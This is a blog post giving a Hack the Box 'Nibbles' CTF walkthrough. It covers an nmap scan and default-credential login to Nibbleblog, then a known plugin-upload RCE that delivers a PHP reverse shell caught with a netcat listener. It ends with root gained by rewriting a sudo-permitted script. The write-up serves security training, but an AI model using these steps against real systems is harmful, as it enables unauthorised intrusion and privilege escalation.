<!doctype html><html lang=en-us>
<head>
<meta charset=utf-8>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta http-equiv=x-ua-compatible content="IE=edge">
<meta name=generator content="Hugo 0.92.2 with theme Tranquilpeak 0.4.8-BETA">
<meta name=author content="Christoffer Claesson">
<meta name=keywords content>
<meta name=description content="My writeup of the Hack the box Nibbles box&mldr; Nibble nibble!">
<meta property="og:description" content="My writeup of the Hack the box Nibbles box&mldr; Nibble nibble!">
<meta property="og:type" content="article">
<meta property="og:title" content="Nibbles Writeup">
<meta name=twitter:title content="Nibbles Writeup">
<meta property="og:url" content="https://blog.securitybits.io/2018/03/nibbles-writeup/">
<meta property="twitter:url" content="https://blog.securitybits.io/2018/03/nibbles-writeup/">
<meta property="og:site_name" content="Securitybits.io">
<meta property="og:description" content="My writeup of the Hack the box Nibbles box&mldr; Nibble nibble!">
<meta name=twitter:description content="My writeup of the Hack the box Nibbles box&mldr; Nibble nibble!">
<meta property="og:locale" content="en-us">
<meta property="article:published_time" content="2018-03-08T00:00:00">
<meta property="article:modified_time" content="2018-03-08T00:00:00">
<meta property="article:section" content="Hackthebox">
<meta property="article:section" content="CTF">
<meta property="article:section" content="Writeup">
<meta property="article:tag" content="hackthebox">
<meta property="article:tag" content="htb">
<meta property="article:tag" content="pentest">
<meta property="article:tag" content="ctf">
<meta name=twitter:card content="summary">
<meta name=twitter:site content="@Securitybits_io">
<meta name=twitter:creator content="@Securitybits_io">
<meta property="og:image" content="https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibble_banner.jpg">
<meta property="twitter:image" content="https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibble_banner.jpg">
<meta property="og:image" content="https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibble_banner.jpg">
<meta property="twitter:image" content="https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibble_banner.jpg">
<meta property="og:image" content="https://blog.securitybits.io/img/profile.jpg">
<meta property="twitter:image" content="https://blog.securitybits.io/img/profile.jpg">
<title>Nibbles Writeup</title>
<link rel=icon href=https://blog.securitybits.io/favicon.png>
<link rel=canonical href=https://blog.securitybits.io/2018/03/nibbles-writeup/>
<link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin=anonymous>
<link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin=anonymous>
<link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin=anonymous>
<link rel=stylesheet href=https://blog.securitybits.io/css/style-twzjdbqhmnnacqs0pwwdzcdbt8yhv8giawvjqjmyfoqnvazl0dalmnhdkvp7.min.css>
<script type=application/javascript>var doNotTrack=!1;doNotTrack||(function(a,e,f,g,b,c,d){a.GoogleAnalyticsObject=b,a[b]=a[b]||function(){(a[b].q=a[b].q||[]).push(arguments)},a[b].l=1*new Date,c=e.createElement(f),d=e.getElementsByTagName(f)[0],c.async=1,c.src=g,d.parentNode.insertBefore(c,d)}(window,document,'script','https://www.google-analytics.com/analytics.js','ga'),ga('create','UA-115328400-1','auto'),ga('send','pageview'))</script>
</head>
<body>
<div id=blog>
<header id=header data-behavior=5>
<i id=btn-open-sidebar class="fa fa-lg fa-bars"></i>
<div class=header-title>
<a class=header-title-link href=https://blog.securitybits.io/>Securitybits.io</a>
</div>
<a class=header-right-picture href=https://blog.securitybits.io/#about>
<img class=header-picture src=https://blog.securitybits.io/img/profile.jpg alt="Author's picture">
</a>
</header>
<nav id=sidebar data-behavior=5>
<div class=sidebar-container>
<div class=sidebar-profile>
<a href=https://blog.securitybits.io/#about>
<img class=sidebar-profile-picture src=https://blog.securitybits.io/img/profile.jpg alt="Author's picture">
</a>
<h4 class=sidebar-profile-name>Christoffer Claesson</h4>
<h5 class=sidebar-profile-bio>Security ramblings from a viking</h5>
</div>
<ul class=sidebar-buttons>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://blog.securitybits.io/>
<i class="sidebar-button-icon fa fa-lg fa-home"></i>
<span class=sidebar-button-desc>Home</span>
</a>
</li>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://blog.securitybits.io/categories>
<i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
<span class=sidebar-button-desc>Categories</span>
</a>
</li>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://blog.securitybits.io/tags>
<i class="sidebar-button-icon fa fa-lg fa-tags"></i>
<span class=sidebar-button-desc>Tags</span>
</a>
</li>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://blog.securitybits.io/archives>
<i class="sidebar-button-icon fa fa-lg fa-archive"></i>
<span class=sidebar-button-desc>Archives</span>
</a>
</li>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://blog.securitybits.io/page/about-me>
<i class="sidebar-button-icon fa fa-lg fa-question"></i>
<span class=sidebar-button-desc>About Me</span>
</a>
</li>
</ul>
<ul class=sidebar-buttons>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://github.com/Securitybits-io target=_blank rel=noopener>
<i class="sidebar-button-icon fa fa-lg fa-github"></i>
<span class=sidebar-button-desc>GitHub</span>
</a>
</li>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://twitter.com/Securitybits_io target=_blank rel=noopener>
<i class="sidebar-button-icon fa fa-lg fa-twitter"></i>
<span class=sidebar-button-desc>Twitter</span>
</a>
</li>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://keybase.io/securitybits target=_blank rel=noopener>
<i class="sidebar-button-icon fa fa-lg fa-code-fork"></i>
<span class=sidebar-button-desc>Keybase.io</span>
</a>
</li>
</ul>
<ul class=sidebar-buttons>
<li class=sidebar-button>
<a class=sidebar-button-link href=https://blog.securitybits.io/index.xml>
<i class="sidebar-button-icon fa fa-lg fa-rss"></i>
<span class=sidebar-button-desc>RSS</span>
</a>
</li>
</ul>
</div>
</nav>
<div class="post-header-cover
text-center
post-header-cover--partial" style=background-image:url(/img/posts/2018/03/nibbles-writeup/nibble_banner.jpg) data-behavior=5>
</div>
<div id=main data-behavior=5 class="hasCover
hasCoverMetaOut">
<article class=post itemscope itemtype=http://schema.org/BlogPosting>
<div class="post-header main-content-wrap text-center">
<h1 class=post-title itemprop=headline>
Nibbles Writeup
</h1>
<div class="postShorten-meta post-meta">
<time itemprop=datePublished datetime=2018-03-08T00:00:00Z>
March 8, 2018
</time>
<span>in</span>
<a class=category-link href=https://blog.securitybits.io/categories/hackthebox>Hackthebox</a>,
<a class=category-link href=https://blog.securitybits.io/categories/ctf>CTF</a>,
<a class=category-link href=https://blog.securitybits.io/categories/writeup>Writeup</a>
</div>
</div>
<div class="post-content markdown" itemprop=articleBody>
<div class=main-content-wrap>
<p>Connecting to Hack the Box<sup id=fnref:1><a href=#fn:1 class=footnote-ref role=doc-noteref>1</a></sup> using the supplied VPN, my Nibbles box have the IP: 10.10.10.75
As per usual, lets start with Recon and NMAP the target IP</p>
<pre tabindex=0><code>root@kali:~/Nibbles$ nmap -p- --version-all -sV -sS 10.10.10.75
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-09 07:44 CET
Nmap scan report for nibbles.htb (10.10.10.75)
Host is up (0.047s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.18 seconds
</code></pre><p>Seeing port 80 open, lets browse to that and look at the source code, as the base directory doesn&rsquo;t show anything revealing.</p>
<pre tabindex=0><code>&lt;b&gt;Hello world!&lt;/b&gt;
&lt;!-- /nibbleblog/ directory. Nothing interesting here! --&gt;
</code></pre><p>Seeing that we have a new directory to explore, lets go to /nibbleblog/.
<img src=https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibblesblog-root.png alt=nibblesblog-root>
So that points to the Content Management System (CMS) called Nibbleblog, which is opensource and free to download the sourcecode, which means we can take a look at it.
A bit of googling points me to the github <a href=https://github.com/dignajar/nibbleblog>https://github.com/dignajar/nibbleblog</a>
Where the basefile &ldquo;admin.php&rdquo; looks interesting, and sure enough it does exist on our target.
<img src=https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibblesblog-admin.png alt=nibblesblog-admin>
The next interesting file from the github looks to be &ldquo;install.php&rdquo;, on our target blog it is obviously already installed, nontheless it might be worth checking out!
<img src=https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibblesblog-install.png alt=nibblesblog-install>
Lets follow the update link to the update page!
<img src=https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibblesblog-update.png alt=nibblesblog-update>
So this further reveals two files where one is quite interesting, as config files usually contains usernames even possibly passwords, and other essential config parameters!
So lets browse to /nibbleblog/content/private/config.xml</p>
<pre tabindex=0><code>&lt;config&gt;
[...snip...]
&lt;notification_email_to type=&quot;string&quot;&gt;admin@nibbles.com&lt;/notification_email_to&gt;
&lt;notification_email_from type=&quot;string&quot;&gt;noreply@10.10.10.134&lt;/notification_email_from&gt;
&lt;seo_site_title type=&quot;string&quot;&gt;Nibbles - Yum yum&lt;/seo_site_title&gt;
[...snip...]
&lt;/config&gt;
</code></pre><p>So this time the config file does not reveal any passwords, although we&rsquo;re not emptyhanded as we do get a valid username &ldquo;admin&rdquo;.
After some further enumeration i could not find a hint towards a password or any other vulnerability to use. So i resulted in trying THC-Hydra<sup id=fnref:2><a href=#fn:2 class=footnote-ref role=doc-noteref>2</a></sup> and a small passwordlist in an attempt to run a dictionary against the login page!
Which only got me on their blacklist and blocked me a couple minutes from making further login attempts.
<img src=https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibblesblog-login-blacklist.png alt=nibblesblog-login-blacklist>
Then after some further checking of the source code, i recalled it supposed to be a fairly simple box, so back to some default passwords.
Bingo, user: Admin, Password: nibbles so a weak password indeed.
Doing a grep for the password &ldquo;nibbles&rdquo; in the standard &ldquo;rockyou.txt&rdquo; that is included in Kali linux.</p>
<pre tabindex=0><code>root@kali:~/Wordlists$ grep 'nibbles' rockyou.txt
nibbles
nibbles1
[...snip...]
</code></pre><p>We can see that doing the hydra would indeed work&mldr; eventually, you&rsquo;d just have to do some timeouts between attempts.
Either way, we have the password and is logged in to the CMS admin panel!
<img src=https://blog.securitybits.io/img/posts/2018/03/nibbles-writeup/nibblesblog-logged-in.png alt=nibblesblog-logged-in>
Next up would be to try and get a shell on the system somehow, so back to google!
It eventually pointed me to another security researchers blog <a href=https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html>CureSec Nibbleblog 4.0.3 RCE</a><sup id=fnref:3><a href=#fn:3 class=footnote-ref role=doc-noteref>3</a></sup>
The PoC Exploit work in 4 steps</p>
<pre tabindex=0><code>1. Obtain Admin credentials
2. Activate My image plugin
3. Upload PHP shell, ignore warnings
4. Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php
</code></pre><p>So since we are already logged in, we can go to step two and activate the &ldquo;My Image Plugin&rdquo; under Plugins in the CMS Admin Panel.
Then lets create and upload a php reverse shell.
My favourite php-reverse-shell is included in kali, that pentestmonkey created.
Copy that to the working directory by issuing.</p>
<pre tabindex=0><code>root@kali:~/Nibbles$ cp /usr/share/webshells/php/php-reverse-shell.php .
</code></pre><p>Then edit the $ip and $port variable in the php script, in this example i use port 4000. Once thats done, we can upload it to the CMS and start a netcat listener on our chosen port with (nc -lvvp 4000)
In this example i used curl to trigger the RCE since the &ldquo;image.php&rdquo; is in a public folder.</p>
<pre tabindex=0><code>root@kali:~/Nibbles$ curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
</code></pre><p>That should kick of a basic shell created by the PHP script to the Netcat listener.
Although the shell we recieve is a limited one, so lets enumerate which perl and python libraries are present to escape the limited shell.</p>
<pre tabindex=0><code>root@kali:~/Nibbles$ nc -lvvp 4000
listening on [any] 4000 ...
connect to [10.10.14.2] from nibbles.htb [10.10.10.75] 49562
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 01:55:01 up 4 days,  6:33,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which perl
/usr/bin/perl
$ which python3
/usr/bin/python3
$ python3 -c &quot;import pty; pty.spawn('/bin/bash');&quot;  
nibbler@Nibbles:/$ ls /home/nibbler
ls /home/nibbler
personal  personal.zip  user.txt
nibbler@Nibbles:/$
</code></pre><p>Since i am a Python guy, that&rsquo;s a quite an easy choice.
Now that we have the &ldquo;user.txt&rdquo; flag, lets get root!
One easy command to run is &ldquo;sudo -l&rdquo;, which will report if the current user is in the /etc/sudoers file, as well list what commands the current user is allowed to run.</p>
<pre tabindex=0><code>nibbler@Nibbles:/$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/$
</code></pre><p>Easy enough, at a quick glance in enumeration we can see that user nibbler is allowed to run &ldquo;/home/nibbler/personal/stuff/monitor.sh&rdquo; as root without a password!
At this point getting the root flag should be fairly simple!</p>
<pre tabindex=0><code>nibbler@Nibbles:/home/nibbler/personal/stuff$ echo &quot;/bin/cat /root/root.txt&quot; &gt; monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
b6d745[...snip...]8ef88c
nibbler@Nibbles:/home/nibbler/personal/stuff$
</code></pre><p>Done.</p>
<section class=footnotes role=doc-endnotes>
<hr>
<ol>
<li id=fn:1 role=doc-endnote>
<p><a href=www.hackthebox.eu> www.hackthebox.eu</a>&#160;<a href=#fnref:1 class=footnote-backref role=doc-backlink>&#8617;&#xfe0e;</a></p>
</li>
<li id=fn:2 role=doc-endnote>
<p><a href=https://tools.kali.org/password-attacks/hydra>https://tools.kali.org/password-attacks/hydra</a>&#160;<a href=#fnref:2 class=footnote-backref role=doc-backlink>&#8617;&#xfe0e;</a></p>
</li>
<li id=fn:3 role=doc-endnote>
<p><a href=https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html>https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html</a>&#160;<a href=#fnref:3 class=footnote-backref role=doc-backlink>&#8617;&#xfe0e;</a></p>
</li>
</ol>
</section>
</div>
</div>
<div id=post-footer class="post-footer main-content-wrap">
<div class=post-actions-wrap>
<nav>
<ul class="post-actions post-action-nav">
<li class=post-action>
<a class="post-action-btn btn btn--default tooltip--top" href=https://blog.securitybits.io/2018/04/rsa-prime-decryption/ data-tooltip="RSA Prime Decryption">
<i class="fa fa-angle-left"></i>
<span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
</a>
</li>
<li class=post-action>
<a class="post-action-btn btn btn--default tooltip--top" href=https://blog.securitybits.io/2018/03/sdl-bolt-on-or-built-in/ data-tooltip="SDL: Bolt on or Built in?">
<span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
<i class="fa fa-angle-right"></i>
</a>
</li>
</ul>
</nav>
<ul class="post-actions post-action-share">
<li class="post-action hide-lg hide-md hide-sm">
<a class="post-action-btn btn btn--default btn-open-shareoptions" href=#btn-open-shareoptions>
<i class="fa fa-share-alt"></i>
</a>
</li>
<li class="post-action hide-xs">
<a class="post-action-btn btn btn--default" target=new href="https://www.facebook.com/sharer/sharer.php?u=https://blog.securitybits.io/2018/03/nibbles-writeup/">
<i class="fa fa-facebook-official"></i>
</a>
</li>
<li class="post-action hide-xs">
<a class="post-action-btn btn btn--default" target=new href="https://twitter.com/intent/tweet?text=https://blog.securitybits.io/2018/03/nibbles-writeup/">
<i class="fa fa-twitter"></i>
</a>
</li>
<li class="post-action hide-xs">
<a class="post-action-btn btn btn--default" target=new href="https://plus.google.com/share?url=https://blog.securitybits.io/2018/03/nibbles-writeup/">
<i class="fa fa-google-plus"></i>
</a>
</li>
<li class=post-action>
<a class="post-action-btn btn btn--default" href=#>
<i class="fa fa-list"></i>
</a>
</li>
</ul>
</div>
</div>
</article>
<footer id=footer class=main-content-wrap>
<span class=copyrights>
&copy; 2022 Christoffer Claesson. All Rights Reserved
</span>
</footer>
</div>
<div id=bottom-bar class=post-bottom-bar data-behavior=5>
<div class=post-actions-wrap>
<nav>
<ul class="post-actions post-action-nav">
<li class=post-action>
<a class="post-action-btn btn btn--default tooltip--top" href=https://blog.securitybits.io/2018/04/rsa-prime-decryption/ data-tooltip="RSA Prime Decryption">
<i class="fa fa-angle-left"></i>
<span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
</a>
</li>
<li class=post-action>
<a class="post-action-btn btn btn--default tooltip--top" href=https://blog.securitybits.io/2018/03/sdl-bolt-on-or-built-in/ data-tooltip="SDL: Bolt on or Built in?">
<span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
<i class="fa fa-angle-right"></i>
</a>
</li>
</ul>
</nav>
<ul class="post-actions post-action-share">
<li class="post-action hide-lg hide-md hide-sm">
<a class="post-action-btn btn btn--default btn-open-shareoptions" href=#btn-open-shareoptions>
<i class="fa fa-share-alt"></i>
</a>
</li>
<li class="post-action hide-xs">
<a class="post-action-btn btn btn--default" target=new href="https://www.facebook.com/sharer/sharer.php?u=https://blog.securitybits.io/2018/03/nibbles-writeup/">
<i class="fa fa-facebook-official"></i>
</a>
</li>
<li class="post-action hide-xs">
<a class="post-action-btn btn btn--default" target=new href="https://twitter.com/intent/tweet?text=https://blog.securitybits.io/2018/03/nibbles-writeup/">
<i class="fa fa-twitter"></i>
</a>
</li>
<li class="post-action hide-xs">
<a class="post-action-btn btn btn--default" target=new href="https://plus.google.com/share?url=https://blog.securitybits.io/2018/03/nibbles-writeup/">
<i class="fa fa-google-plus"></i>
</a>
</li>
<li class=post-action>
<a class="post-action-btn btn btn--default" href=#>
<i class="fa fa-list"></i>
</a>
</li>
</ul>
</div>
</div>
<div id=share-options-bar class=share-options-bar data-behavior=5>
<i id=btn-close-shareoptions class="fa fa-close"></i>
<ul class=share-options>
<li class=share-option>
<a class=share-option-btn target=new href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fblog.securitybits.io%2F2018%2F03%2Fnibbles-writeup%2F">
<i class="fa fa-facebook-official"></i><span>Share on Facebook</span>
</a>
</li>
<li class=share-option>
<a class=share-option-btn target=new href="https://twitter.com/intent/tweet?text=https%3A%2F%2Fblog.securitybits.io%2F2018%2F03%2Fnibbles-writeup%2F">
<i class="fa fa-twitter"></i><span>Share on Twitter</span>
</a>
</li>
<li class=share-option>
<a class=share-option-btn target=new href="https://plus.google.com/share?url=https%3A%2F%2Fblog.securitybits.io%2F2018%2F03%2Fnibbles-writeup%2F">
<i class="fa fa-google-plus"></i><span>Share on Google+</span>
</a>
</li>
</ul>
</div>
<div id=share-options-mask class=share-options-mask></div>
</div>
<div id=about>
<div id=about-card>
<div id=about-btn-close>
<i class="fa fa-remove"></i>
</div>
<img id=about-card-picture src=https://blog.securitybits.io/img/profile.jpg alt="Author's picture">
<h4 id=about-card-name>Christoffer Claesson</h4>
<div id=about-card-bio>Security ramblings from a viking</div>
<div id=about-card-job>
<i class="fa fa-briefcase"></i>
<br>
Senior Penetration Tester
</div>
<div id=about-card-location>
<i class="fa fa-map-marker"></i>
<br>
Sweden
</div>
</div>
</div>
<div id=cover style=background-image:url(https://blog.securitybits.io/img/side-banner.jpg)></div>
<script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin=anonymous></script>
<script src=https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw=" crossorigin=anonymous></script>
<script src=https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.7/js/jquery.fancybox.min.js integrity="sha256-GEAnjcTqVP+vBp3SSc8bEDQqvWAZMiHyUSIorrWwH50=" crossorigin=anonymous></script>
<script src=https://blog.securitybits.io/js/script-pcw6v3xilnxydl1vddzazdverrnn9ctynvnxgwho987mfyqkuylcb1nlt.min.js></script>
<script lang=javascript>window.onload=updateMinWidth,window.onresize=updateMinWidth,document.getElementById("sidebar").addEventListener("transitionend",updateMinWidth);function updateMinWidth(){var b=document.getElementById("sidebar"),a=document.getElementById("main"),c,d,e;a.style.minWidth="",c=getComputedStyle(a).getPropertyValue("min-width"),d=getComputedStyle(b).getPropertyValue("width"),e=getComputedStyle(b).getPropertyValue("left"),a.style.minWidth=`calc(${c} - ${d} - ${e})`}</script>
<script>$(document).ready(function(){hljs.configure({classPrefix:'',useBR:!1}),$('pre.code-highlight > code, pre > code').each(function(b,a){$(this).hasClass('codeblock')||$(this).addClass('codeblock'),hljs.highlightBlock(a)})})</script>
</body>
</html>